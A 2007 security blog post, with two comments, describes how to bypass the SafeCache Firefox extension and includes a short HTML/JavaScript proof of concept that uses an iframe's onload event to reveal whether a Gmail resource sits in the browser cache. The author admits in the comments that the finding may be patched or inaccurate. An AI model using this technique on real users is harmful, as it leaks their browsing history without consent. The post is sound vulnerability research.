Saturday, February 10, 2007

Attacking the SafeCache Firefox Extension

Well, SudoLabs got taken down since almost no-one was using it, so now troopa is using the domain for his blog, so I'm moving all my content here:

The SafeCache extension is yet another good idea in browser security to come out of Stanford University. Essentially it extends the browser same origin policy to the browser cache to defend against cache timing attacks. You can find more info about it here: http://www.safecache.com/

Now while I have not looked at the source code to the extension, I have devised a method for not only being able to perform timing attacks, but to be able to directly determine whether or not the objects you are trying to find info about are in the cache or not.

It seems that if you create an iframe element where the src attribute points to the resource whose cache state you want to query, then the onload event will fire only if the item is not in any cache.

To test this either login to Gmail, or go to http://mail.google.com/mail/help/images/logo.gif and then create a page like the following:

<html>
<body>
<script>
function loaded() {
var time = new Date();
var t2 = time.getTime();
alert(t2- t1);
}
var time = new Date();
var t1 = time.getTime();
</script>
<iframe src="http://mail.google.com/mail/help/images/logo.gif" onload="loaded()">
</iframe>
</body>
</html>



And you will notice that the onload element does not fire. Then if you press Ctrl+Shift+Del and delete the cache, then visit the html page you just created again, the onload event will fire.

If you refresh the page, the onload event will not fire a second time because the image is already in the cache.

So while it stops standard cache timing attacks, it does not stop attacks against itself.

2 comments:

Anonymous said...

Sorry to say that I did not get the point that you mentioned about SafeCache that "it prevents standard timing attackes on cache but cant protect ttestlf".

I'm sorry if that is obvious from the example that you have given here, but please elaborate.

kuza55 said...

Well, at this stage I don't know if what I was talking about has been patched (because the extension has been patched for something), or if I simply put out a half baked piece of research that wasn't accurate. obviously I think it was patched, but you never know, and I can't find the old versions anywhere.

Anyway, the point of the SafeCache extension is to prevent timing attacks against the browser cache.

My point was that while it does that effectively, it missed a spot where attacks against the SafeCache extension itself (i.e. like the one I described in this post) can still extract the same information, and in some cases such as this one, in a much more accurate fashion.